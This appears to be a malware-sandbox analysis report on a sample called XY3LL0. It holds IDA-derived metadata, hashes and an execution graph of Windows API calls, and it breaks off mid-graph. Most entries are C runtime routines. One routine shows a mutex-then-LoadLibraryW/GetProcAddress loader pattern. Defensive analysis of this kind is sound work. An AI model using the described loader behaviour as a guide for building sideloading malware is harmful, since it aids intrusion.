                                                                                            • Instruction ID: 66a67fb8f7695ebb67c8991702c80351692a1b5aaff3c6c0750bb5ec7d6270cd
                                                                                            • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                            • Instruction Fuzzy Hash: A9110633A147868AE714AF22E44196D67A4EB58FD4F088035EF9907B8ACE38D951C781
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: TimerWaitable
                                                                                            • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                            • API String ID: 1823812067-484248852
                                                                                            • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                            • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                                                            • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                            • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                                                            APIs
                                                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8FDF9112F), ref: 00007FF8FDF939E0
                                                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8FDF9112F), ref: 00007FF8FDF93A21
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                            • String ID: csm
                                                                                            • API String ID: 2573137834-1018135373
                                                                                            • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                            • Instruction ID: 716f8988ed93af115ed25acc188dbe529c2e052a07fef8d9c36ab61d3cfd90ed
                                                                                            • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                            • Instruction Fuzzy Hash: 8A115E33A18B4186EB208B25E80066977E5FB98B98F584230DF9E07B98EF3CD551CB40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: TimerWaitable
                                                                                            • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                            • API String ID: 1823812067-3336177065
                                                                                            • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                            • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                                                            • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                            • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3859560861-0
                                                                                            • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                            • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                                                            • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                            • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                                                            Execution Graph

                                                                                            Execution Coverage:6%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:1.3%
                                                                                            Total number of Nodes:1047
                                                                                            Total number of Limit Nodes:29
                                                                                            execution_graph 3927 631242 3928 631251 3927->3928 3929 631257 3927->3929 3931 631697 _abort 66 API calls 3928->3931 3933 6316bc 3929->3933 3931->3929 3932 63125c _realloc 3934 631555 _doexit 66 API calls 3933->3934 3935 6316c7 3934->3935 3935->3932 4407 631281 4410 63283c 4407->4410 4409 631286 4409->4409 4411 632861 4410->4411 4412 63286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4410->4412 4411->4412 4413 632865 4411->4413 4412->4413 4413->4409 3936 634247 3946 6341cb 3936->3946 3939 634272 setSBCS 3940 6310cc ___convertcp 5 API calls 3939->3940 3941 63442a 3940->3941 3942 6342b6 IsValidCodePage 3942->3939 3943 6342c8 GetCPInfo 3942->3943 3943->3939 3945 6342db ___convertcp __setmbcp_nolock 3943->3945 3953 633f0d GetCPInfo 3945->3953 3963 634144 3946->3963 3949 6341ea GetOEMCP 3952 6341fa 3949->3952 3950 634208 3951 63420d GetACP 3950->3951 3950->3952 3951->3952 3952->3939 3952->3942 3952->3945 3954 633ff3 3953->3954 3955 633f41 ___convertcp 3953->3955 3958 6310cc ___convertcp 5 API calls 3954->3958 4179 635fe2 3955->4179 3960 63409e 3958->3960 3960->3945 3962 636415 ___crtLCMapStringA 101 API calls 3962->3954 3964 634157 3963->3964 3968 6341a4 3963->3968 3971 632345 3964->3971 3968->3949 3968->3950 3969 634184 3969->3968 3991 6340a0 3969->3991 3972 6322cc __getptd_noexit 66 API calls 3971->3972 3973 63234d 3972->3973 3974 63235a 3973->3974 3975 631411 __amsg_exit 66 API calls 3973->3975 3974->3969 3976 633e04 3974->3976 3975->3974 3977 633e10 _realloc 3976->3977 3978 632345 __getptd 66 API calls 3977->3978 3979 633e15 3978->3979 3980 633e43 3979->3980 3982 633e27 3979->3982 3981 632aa0 __lock 66 API calls 3980->3981 3983 633e4a 3981->3983 3984 632345 __getptd 66 API calls 3982->3984 4007 633dc6 3983->4007 3986 633e2c 3984->3986 3989 633e3a _realloc 3986->3989 3990 631411 __amsg_exit 66 API calls 3986->3990 3989->3969 3990->3989 3992 6340ac _realloc 3991->3992 3993 632345 __getptd 66 API calls 3992->3993 3994 6340b1 3993->3994 3995 6340c3 3994->3995 3996 632aa0 __lock 66 API calls 3994->3996 3998 6340d1 _realloc 3995->3998 4000 631411 __amsg_exit 66 API calls 3995->4000 3997 6340e1 3996->3997 3999 63412a 3997->3999 4002 634112 InterlockedIncrement 3997->4002 4003 6340f8 InterlockedDecrement 3997->4003 3998->3968 4175 63413b 3999->4175 4000->3998 4002->3999 4003->4002 4004 634103 4003->4004 4004->4002 4005 6335ee ___convertcp 66 API calls 4004->4005 4006 634111 4005->4006 4006->4002 4008 633dca 4007->4008 4009 633dfc 4007->4009 4008->4009 4010 633c9e ___addlocaleref 8 API calls 4008->4010 4015 633e6e 4009->4015 4011 633ddd 4010->4011 4011->4009 4018 633d2d 4011->4018 4174 6329c6 LeaveCriticalSection 4015->4174 4017 633e75 4017->3986 4019 633dc1 4018->4019 4020 633d3e InterlockedDecrement 4018->4020 4019->4009 4032 633b55 4019->4032 4021 633d53 InterlockedDecrement 4020->4021 4022 633d56 4020->4022 4021->4022 4023 633d63 4022->4023 4024 633d60 InterlockedDecrement 4022->4024 4025 633d70 4023->4025 4026 633d6d InterlockedDecrement 4023->4026 4024->4023 4027 633d7a InterlockedDecrement 4025->4027 4029 633d7d 4025->4029 4026->4025 4027->4029 4028 633d96 InterlockedDecrement 4028->4029 4029->4028 4030 633da6 InterlockedDecrement 4029->4030 4031 633db1 InterlockedDecrement 4029->4031 4030->4029 4031->4019 4033 633bd9 4032->4033 4036 633b6c 4032->4036 4034 6335ee ___convertcp 66 API calls 4033->4034 4035 633c26 4033->4035 4037 633bfa 4034->4037 4047 633c4d 4035->4047 4086 635ae1 4035->4086 4036->4033 4043 6335ee ___convertcp 66 API calls 4036->4043 4058 633ba0 4036->4058 4039 6335ee ___convertcp 66 API calls 4037->4039 4044 633c0d 4039->4044 4041 633c92 4046 6335ee ___convertcp 66 API calls 4041->4046 4042 6335ee ___convertcp 66 API calls 4042->4047 4048 633b95 4043->4048 4049 6335ee ___convertcp 66 API calls 4044->4049 4045 6335ee ___convertcp 66 API calls 4051 633bce 4045->4051 4052 633c98 4046->4052 4047->4041 4056 6335ee 66 API calls ___convertcp 4047->4056 4062 635cbb 4048->4062 4054 633c1b 4049->4054 4050 6335ee ___convertcp 66 API calls 4055 633bb6 4050->4055 4057 6335ee ___convertcp 66 API calls 4051->4057 4052->4009 4059 6335ee ___convertcp 66 API calls 4054->4059 4078 635c76 4055->4078 4056->4047 4057->4033 4058->4050 4061 633bc1 4058->4061 4059->4035 4061->4045 4063 635d45 4062->4063 4064 635cc8 4062->4064 4063->4058 4065 635cd9 4064->4065 4066 6335ee ___convertcp 66 API calls 4064->4066 4067 635ceb 4065->4067 4068 6335ee ___convertcp 66 API calls 4065->4068 4066->4065 4069 635cfd 4067->4069 4070 6335ee ___convertcp 66 API calls 4067->4070 4068->4067 4071 635d0f 4069->4071 4073 6335ee ___convertcp 66 API calls 4069->4073 4070->4069 4072 635d21 4071->4072 4074 6335ee ___convertcp 66 API calls 4071->4074 4075 635d33 4072->4075 4076 6335ee ___convertcp 66 API calls 4072->4076 4073->4071 4074->4072 4075->4063 4077 6335ee ___convertcp 66 API calls 4075->4077 4076->4075 4077->4063 4079 635c83 4078->4079 4085 635cb7 4078->4085 4080 6335ee ___convertcp 66 API calls 4079->4080 4083 635c93 4079->4083 4080->4083 4081 6335ee ___convertcp 66 API calls 4082 635ca5 4081->4082 4084 6335ee ___convertcp 66 API calls 4082->4084 4082->4085 4083->4081 4083->4082 4084->4085 4085->4061 4087 633c46 4086->4087 4088 635af2 4086->4088 4087->4042 4089 6335ee ___convertcp 66 API calls 4088->4089 4090 635afa 4089->4090 4091 6335ee ___convertcp 66 API calls 4090->4091 4092 635b02 4091->4092 4093 6335ee ___convertcp 66 API calls 4092->4093 4094 635b0a 4093->4094 4095 6335ee ___convertcp 66 API calls 4094->4095 4096 635b12 4095->4096 4097 6335ee ___convertcp 66 API calls 4096->4097 4098 635b1a 4097->4098 4099 6335ee ___convertcp 66 API calls 4098->4099 4100 635b22 4099->4100 4101 6335ee ___convertcp 66 API calls 4100->4101 4102 635b29 4101->4102 4103 6335ee ___convertcp 66 API calls 4102->4103 4104 635b31 4103->4104 4105 6335ee ___convertcp 66 API calls 4104->4105 4106 635b39 4105->4106 4107 6335ee ___convertcp 66 API calls 4106->4107 4108 635b41 4107->4108 4109 6335ee ___convertcp 66 API calls 4108->4109 4110 635b49 4109->4110 4111 6335ee ___convertcp 66 API calls 4110->4111 4112 635b51 4111->4112 4113 6335ee ___convertcp 66 API calls 4112->4113 4114 635b59 4113->4114 4115 6335ee ___convertcp 66 API calls 4114->4115 4116 635b61 4115->4116 4117 6335ee ___convertcp 66 API calls 4116->4117 4118 635b69 4117->4118 4119 6335ee ___convertcp 66 API calls 4118->4119 4120 635b71 4119->4120 4121 6335ee ___convertcp 66 API calls 4120->4121 4122 635b7c 4121->4122 4123 6335ee ___convertcp 66 API calls 4122->4123 4124 635b84 4123->4124 4125 6335ee ___convertcp 66 API calls 4124->4125 4126 635b8c 4125->4126 4127 6335ee ___convertcp 66 API calls 4126->4127 4128 635b94 4127->4128 4129 6335ee ___convertcp 66 API calls 4128->4129 4130 635b9c 4129->4130 4131 6335ee ___convertcp 66 API calls 4130->4131 4132 635ba4 4131->4132 4133 6335ee ___convertcp 66 API calls 4132->4133 4134 635bac 4133->4134 4135 6335ee ___convertcp 66 API calls 4134->4135 4136 635bb4 4135->4136 4137 6335ee ___convertcp 66 API calls 4136->4137 4138 635bbc 4137->4138 4139 6335ee ___convertcp 66 API calls 4138->4139 4140 635bc4 4139->4140 4141 6335ee ___convertcp 66 API calls 4140->4141 4142 635bcc 4141->4142 4143 6335ee ___convertcp 66 API calls 4142->4143 4144 635bd4 4143->4144 4145 6335ee ___convertcp 66 API calls 4144->4145 4146 635bdc 4145->4146 4147 6335ee ___convertcp 66 API calls 4146->4147 4148 635be4 4147->4148 4149 6335ee ___convertcp 66 API calls 4148->4149 4150 635bec 4149->4150 4151 6335ee ___convertcp 66 API calls 4150->4151 4152 635bf4 4151->4152 4153 6335ee ___convertcp 66 API calls 4152->4153 4154 635c02 4153->4154 4155 6335ee ___convertcp 66 API calls 4154->4155 4156 635c0d 4155->4156 4157 6335ee ___convertcp 66 API calls 4156->4157 4158 635c18 4157->4158 4159 6335ee ___convertcp 66 API calls 4158->4159 4160 635c23 4159->4160 4161 6335ee ___convertcp 66 API calls 4160->4161 4162 635c2e 4161->4162 4163 6335ee ___convertcp 66 API calls 4162->4163 4164 635c39 4163->4164 4165 6335ee ___convertcp 66 API calls 4164->4165 4166 635c44 4165->4166 4167 6335ee ___convertcp 66 API calls 4166->4167 4168 635c4f 4167->4168 4169 6335ee ___convertcp 66 API calls 4168->4169 4170 635c5a 4169->4170 4171 6335ee ___convertcp 66 API calls 4170->4171 4172 635c65 4171->4172 4173 6335ee ___convertcp 66 API calls 4172->4173 4173->4087 4174->4017 4178 6329c6 LeaveCriticalSection 4175->4178 4177 634142 4177->3995 4178->4177 4180 634144 _LocaleUpdate::_LocaleUpdate 76 API calls 4179->4180 4181 635ff5 4180->4181 4189 635e28 4181->4189 4184 636415 4185 634144 _LocaleUpdate::_LocaleUpdate 76 API calls 4184->4185 4186 636428 4185->4186 4277 636070 4186->4277 4190 635e74 4189->4190 4191 635e49 GetStringTypeW 4189->4191 4192 635f5b 4190->4192 4193 635e61 4190->4193 4191->4193 4194 635e69 GetLastError 4191->4194 4217 636b1a GetLocaleInfoA 4192->4217 4195 635ead MultiByteToWideChar 4193->4195 4205 635f55 4193->4205 4194->4190 4197 635eda 4195->4197 4195->4205 4206 6354b5 _malloc 66 API calls 4197->4206 4211 635eef ___convertcp __alloca_probe_16 4197->4211 4198 6310cc ___convertcp 5 API calls 4200 633fae 4198->4200 4200->4184 4201 635fac GetStringTypeA 4204 635fc7 4201->4204 4201->4205 4203 635f28 MultiByteToWideChar 4208 635f4f 4203->4208 4209 635f3e GetStringTypeW 4203->4209 4210 6335ee ___convertcp 66 API calls 4204->4210 4205->4198 4206->4211 4213 635446 4208->4213 4209->4208 4210->4205 4211->4203 4211->4205 4214 635452 4213->4214 4215 635463 4213->4215 4214->4215 4216 6335ee ___convertcp 66 API calls 4214->4216 4215->4205 4216->4215 4218 636b4d 4217->4218 4219 636b48 4217->4219 4248 636b04 4218->4248 4221 6310cc ___convertcp 5 API calls 4219->4221 4222 635f7f 4221->4222 4222->4201 4222->4205 4223 636b63 4222->4223 4224 636ba3 GetCPInfo 4223->4224 4225 636c2d 4223->4225 4226 636bba 4224->4226 4227 636c18 MultiByteToWideChar 4224->4227 4228 6310cc ___convertcp 5 API calls 4225->4228 4226->4227 4229 636bc0 GetCPInfo 4226->4229 4227->4225 4232 636bd3 _strlen 4227->4232 4230 635fa0 4228->4230 4229->4227 4231 636bcd 4229->4231 4230->4201 4230->4205 4231->4227 4231->4232 4233 6354b5 _malloc 66 API calls 4232->4233 4236 636c05 ___convertcp __alloca_probe_16 4232->4236 4233->4236 4234 636c62 MultiByteToWideChar 4235 636c7a 4234->4235 4246 636c99 4234->4246 4238 636c81 WideCharToMultiByte 4235->4238 4239 636c9e 4235->4239 4236->4225 4236->4234 4237 635446 __freea 66 API calls 4237->4225 4238->4246 4240 636ca9 WideCharToMultiByte 4239->4240 4241 636cbd 4239->4241 4240->4241 4240->4246 4242 633730 __calloc_crt 66 API calls 4241->4242 4243 636cc5 4242->4243 4244 636cce WideCharToMultiByte 4243->4244 4243->4246 4245 636ce0 4244->4245 4244->4246 4247 6335ee ___convertcp 66 API calls 4245->4247 4246->4237 4247->4246 4251 636f7a 4248->4251 4252 636f93 4251->4252 4255 636d4b 4252->4255 4256 634144 _LocaleUpdate::_LocaleUpdate 76 API calls 4255->4256 4259 636d60 4256->4259 4257 636d72 4258 632c72 _strcat_s 66 API calls 4257->4258 4260 636d77 4258->4260 4259->4257 4262 636daf 4259->4262 4261 632c0a _strcat_s 6 API calls 4260->4261 4264 636b15 4261->4264 4265 636df4 4262->4265 4267 6369e5 4262->4267 4264->4219 4265->4264 4266 632c72 _strcat_s 66 API calls 4265->4266 4266->4264 4268 634144 _LocaleUpdate::_LocaleUpdate 76 API calls 4267->4268 4269 6369f9 4268->4269 4270 636a06 4269->4270 4274 636acc 4269->4274 4270->4262 4273 635fe2 ___crtGetStringTypeA 90 API calls 4273->4270 4275 634144 _LocaleUpdate::_LocaleUpdate 76 API calls 4274->4275 4276 636a2e 4275->4276 4276->4273 4278 636091 LCMapStringW 4277->4278 4282 6360ac 4277->4282 4279 6360b4 GetLastError 4278->4279 4278->4282 4279->4282 4280 6362aa 4284 636b1a ___ansicp 90 API calls 4280->4284 4281 636106 4283 63611f MultiByteToWideChar 4281->4283 4301 6362a1 4281->4301 4282->4280 4282->4281 4287 63614c 4283->4287 4283->4301 4286 6362d2 4284->4286 4285 6310cc ___convertcp 5 API calls 4288 633fce 4285->4288 4289 6363c6 LCMapStringA 4286->4289 4290 6362eb 4286->4290 4286->4301 4294 6354b5 _malloc 66 API calls 4287->4294 4299 636165 __alloca_probe_16 4287->4299 4288->3962 4293 636322 4289->4293 4291 636b63 ___convertcp 73 API calls 4290->4291 4295 6362fd 4291->4295 4292 63619d MultiByteToWideChar 4296 6361b6 LCMapStringW 4292->4296 4297 636298 4292->4297 4298 6363ed 4293->4298 4304 6335ee ___convertcp 66 API calls 4293->4304 4294->4299 4300 636307 LCMapStringA 4295->4300 4295->4301 4296->4297 4303 6361d7 4296->4303 4302 635446 __freea 66 API calls 4297->4302 4298->4301 4306 6335ee ___convertcp 66 API calls 4298->4306 4299->4292 4299->4301 4300->4293 4309 636329 4300->4309 4301->4285 4302->4301 4305 6361e0 4303->4305 4308 636209 4303->4308 4304->4298 4305->4297 4307 6361f2 LCMapStringW 4305->4307 4306->4301 4307->4297 4311 636224 __alloca_probe_16 4308->4311 4313 6354b5 _malloc 66 API calls 4308->4313 4312 63633a ___convertcp __alloca_probe_16 4309->4312 4314 6354b5 _malloc 66 API calls 4309->4314 4310 636258 LCMapStringW 4315 636292 4310->4315 4316 636270 WideCharToMultiByte 4310->4316 4311->4297 4311->4310 4312->4293 4318 636378 LCMapStringA 4312->4318 4313->4311 4314->4312 4317 635446 __freea 66 API calls 4315->4317 4316->4315 4317->4297 4319 636394 4318->4319 4320 636398 4318->4320 4323 635446 __freea 66 API calls 4319->4323 4322 636b63 ___convertcp 73 API calls 4320->4322 4322->4319 4323->4293 3187 631104 3224 63264c 3187->3224 3189 631110 GetStartupInfoW 3190 631133 3189->3190 3225 63261b HeapCreate 3190->3225 3193 631183 3227 63248e GetModuleHandleW 3193->3227 3197 631194 __RTC_Initialize 3261 631dde 3197->3261 3198 6310db _fast_error_exit 66 API calls 3198->3197 3200 6311a2 3201 6311ae GetCommandLineW 3200->3201 3335 631411 3200->3335 3276 631d81 GetEnvironmentStringsW 3201->3276 3205 6311bd 3285 631cd3 GetModuleFileNameW 3205->3285 3208 6311d2 3291 631aa4 3208->3291 3209 631411 __amsg_exit 66 API calls 3209->3208 3212 6311e3 3304 6314d0 3212->3304 3213 631411 __amsg_exit 66 API calls 3213->3212 3215 6311ea 3216 631411 __amsg_exit 66 API calls 3215->3216 3217 6311f5 __wwincmdln 3215->3217 3216->3217 3310 631000 CoInitialize CreateMutexW 3217->3310 3219 631216 3220 631224 3219->3220 3324 631681 3219->3324 3342 6316ad 3220->3342 3223 631229 _realloc 3224->3189 3226 631177 3225->3226 3226->3193 3327 6310db 3226->3327 3228 6324a2 3227->3228 3229 6324a9 3227->3229 3345 6313e1 3228->3345 3231 6324b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3229->3231 3232 632611 3229->3232 3234 6324fc TlsAlloc 3231->3234 3404 6321a8 3232->3404 3237 631189 3234->3237 3238 63254a TlsSetValue 3234->3238 3237->3197 3237->3198 3238->3237 3239 63255b 3238->3239 3349 6316cb 3239->3349 3244 63207e __encode_pointer 6 API calls 3245 63257b 3244->3245 3246 63207e __encode_pointer 6 API calls 3245->3246 3247 63258b 3246->3247 3248 63207e __encode_pointer 6 API calls 3247->3248 3249 63259b 3248->3249 3366 632924 3249->3366 3256 6320f9 __decode_pointer 6 API calls 3257 6325ef 3256->3257 3257->3232 3258 6325f6 3257->3258 3386 6321e5 3258->3386 3260 6325fe GetCurrentThreadId 3260->3237 3731 63264c 3261->3731 3263 631dea GetStartupInfoA 3264 633730 __calloc_crt 66 API calls 3263->3264 3272 631e0b 3264->3272 3265 632029 _realloc 3265->3200 3266 631fa6 GetStdHandle 3271 631f70 3266->3271 3267 633730 __calloc_crt 66 API calls 3267->3272 3268 63200b SetHandleCount 3268->3265 3269 631fb8 GetFileType 3269->3271 3270 631ef3 3270->3265 3270->3271 3273 631f1c GetFileType 3270->3273 3275 63317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3270->3275 3271->3265 3271->3266 3271->3268 3271->3269 3274 63317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3271->3274 3272->3265 3272->3267 3272->3270 3272->3271 3273->3270 3274->3271 3275->3270 3277 631d92 3276->3277 3278 631d96 3276->3278 3277->3205 3280 6336eb __malloc_crt 66 API calls 3278->3280 3281 631db7 3280->3281 3282 631dbe FreeEnvironmentStringsW 3281->3282 3732 6337f0 3281->3732 3282->3205 3286 631d08 _wparse_cmdline 3285->3286 3287 6311c7 3286->3287 3288 631d45 3286->3288 3287->3208 3287->3209 3289 6336eb __malloc_crt 66 API calls 3288->3289 3290 631d4b _wparse_cmdline 3289->3290 3290->3287 3292 631abc _wcslen 3291->3292 3296 6311d8 3291->3296 3293 633730 __calloc_crt 66 API calls 3292->3293 3299 631ae0 _wcslen 3293->3299 3294 631b45 3295 6335ee ___convertcp 66 API calls 3294->3295 3295->3296 3296->3212 3296->3213 3297 633730 __calloc_crt 66 API calls 3297->3299 3298 631b6b 3300 6335ee ___convertcp 66 API calls 3298->3300 3299->3294 3299->3296 3299->3297 3299->3298 3303 631b2a 3299->3303 3736 63367c 3299->3736 3300->3296 3302 632ae2 __invoke_watson 10 API calls 3302->3303 3303->3299 3303->3302 3305 6314de __IsNonwritableInCurrentImage 3304->3305 3745 632dc3 3305->3745 3307 6314fc __initterm_e 3309 63151b __IsNonwritableInCurrentImage __initterm 3307->3309 3749 632dac 3307->3749 3309->3215 3311 631035 GetCommandLineW CommandLineToArgvW 3310->3311 3312 63101f GetLastError 3310->3312 3314 631067 3311->3314 3315 631056 PathFileExistsW 3311->3315 3312->3311 3313 63102c 3312->3313 3313->3219 3317 631084 LoadLibraryW 3314->3317 3315->3314 3316 63106e PathFileExistsW 3315->3316 3316->3314 3316->3317 3318 631091 GetProcAddress 3317->3318 3319 6310aa CloseHandle CoUninitialize 3317->3319 3320 6310a3 FreeLibrary 3318->3320 3321 6310a1 3318->3321 3322 6310c2 3319->3322 3323 6310bb LocalFree 3319->3323 3320->3319 3321->3320 3322->3219 3323->3322 3850 631555 3324->3850 3326 631692 3326->3220 3328 6310e9 3327->3328 3329 6310ee 3327->3329 3330 6318c4 __FF_MSGBANNER 66 API calls 3328->3330 3331 631719 __NMSG_WRITE 66 API calls 3329->3331 3330->3329 3332 6310f6 3331->3332 3333 631465 _fast_error_exit 3 API calls 3332->3333 3334 631100 3333->3334 3334->3193 3336 6318c4 __FF_MSGBANNER 66 API calls 3335->3336 3337 63141b 3336->3337 3338 631719 __NMSG_WRITE 66 API calls 3337->3338 3339 631423 3338->3339 3340 6320f9 __decode_pointer 6 API calls 3339->3340 3341 6311ad 3340->3341 3341->3201 3343 631555 _doexit 66 API calls 3342->3343 3344 6316b8 3343->3344 3344->3223 3346 6313ec Sleep GetModuleHandleW 3345->3346 3347 63140a 3346->3347 3348 63140e 3346->3348 3347->3346 3347->3348 3348->3229 3415 6320f0 3349->3415 3351 6316d3 __init_pointers __initp_misc_winsig 3418 632913 3351->3418 3354 63207e __encode_pointer 6 API calls 3355 63170f 3354->3355 3356 63207e TlsGetValue 3355->3356 3357 6320b7 GetModuleHandleW 3356->3357 3358 632096 3356->3358 3359 6320d2 GetProcAddress 3357->3359 3360 6320c7 3357->3360 3358->3357 3361 6320a0 TlsGetValue 3358->3361 3364 6320af 3359->3364 3362 6313e1 __crt_waiting_on_module_handle 2 API calls 3360->3362 3365 6320ab 3361->3365 3363 6320cd 3362->3363 3363->3359 3363->3364 3364->3244 3365->3357 3365->3364 3367 63292f 3366->3367 3369 6325a8 3367->3369 3421 63317c 3367->3421 3369->3232 3370 6320f9 TlsGetValue 3369->3370 3371 632132 GetModuleHandleW 3370->3371 3372 632111 3370->3372 3373 632142 3371->3373 3374 63214d GetProcAddress 3371->3374 3372->3371 3375 63211b TlsGetValue 3372->3375 3376 6313e1 __crt_waiting_on_module_handle 2 API calls 3373->3376 3377 63212a 3374->3377 3379 632126 3375->3379 3378 632148 3376->3378 3377->3232 3380 633730 3377->3380 3378->3374 3378->3377 3379->3371 3379->3377 3381 633739 3380->3381 3383 6325d5 3381->3383 3384 633757 Sleep 3381->3384 3426 63557f 3381->3426 3383->3232 3383->3256 3385 63376c 3384->3385 3385->3381 3385->3383 3710 63264c 3386->3710 3388 6321f1 GetModuleHandleW 3389 632201 3388->3389 3390 632207 3388->3390 3391 6313e1 __crt_waiting_on_module_handle 2 API calls 3389->3391 3392 632243 3390->3392 3393 63221f GetProcAddress GetProcAddress 3390->3393 3391->3390 3394 632aa0 __lock 62 API calls 3392->3394 3393->3392 3395 632262 InterlockedIncrement 3394->3395 3711 6322ba 3395->3711 3398 632aa0 __lock 62 API calls 3399 632283 3398->3399 3714 633c9e InterlockedIncrement 3399->3714 3401 6322a1 3726 6322c3 3401->3726 3403 6322ae _realloc 3403->3260 3405 6321b2 3404->3405 3406 6321be 3404->3406 3409 6320f9 __decode_pointer 6 API calls 3405->3409 3407 6321d2 TlsFree 3406->3407 3408 6321e0 3406->3408 3407->3408 3410 63298b DeleteCriticalSection 3408->3410 3411 6329a3 3408->3411 3409->3406 3412 6335ee ___convertcp 66 API calls 3410->3412 3413 6329c3 3411->3413 3414 6329b5 DeleteCriticalSection 3411->3414 3412->3408 3413->3237 3414->3411 3416 63207e __encode_pointer 6 API calls 3415->3416 3417 6320f7 3416->3417 3417->3351 3419 63207e __encode_pointer 6 API calls 3418->3419 3420 631705 3419->3420 3420->3354 3425 63264c 3421->3425 3423 633188 InitializeCriticalSectionAndSpinCount 3424 6331cc _realloc 3423->3424 3424->3367 3425->3423 3427 63558b _realloc 3426->3427 3428 6355a3 3427->3428 3436 6355c2 ___convertcp 3427->3436 3439 632c72 3428->3439 3432 635634 HeapAlloc 3432->3436 3435 6355b8 _realloc 3435->3381 3436->3432 3436->3435 3445 632aa0 3436->3445 3452 634dc3 3436->3452 3458 63567b 3436->3458 3461 6331eb 3436->3461 3464 6322cc GetLastError 3439->3464 3441 632c77 3442 632c0a 3441->3442 3443 6320f9 